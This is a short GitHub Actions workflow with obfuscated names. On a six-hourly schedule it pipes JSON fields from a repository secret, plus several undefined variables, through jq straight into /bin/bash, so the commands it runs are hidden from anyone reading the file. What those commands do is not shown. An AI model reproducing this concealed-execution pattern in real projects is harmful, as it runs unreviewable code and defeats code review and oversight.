name: yanhouchangyhc
on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanhouchangyhc
        env:
          lr719: ${{ secrets.lr719 }}
        run: |
          echo $lr719 | jq -r .pkw69 | /bin/bash
          echo $mho0542 | jq -r .q31403 | /bin/bash
          echo $uuu1 | jq -r .ssaie721 | /bin/bash
          echo $cg585 | jq -r .v51347 | /bin/bash
          echo $pf81825 | jq -r .e57 | /bin/bash
          echo $gd37017 | jq -r .cdpec3602 | /bin/bash
          echo $wwdyg1371 | jq -r .mjx72 | /bin/bash

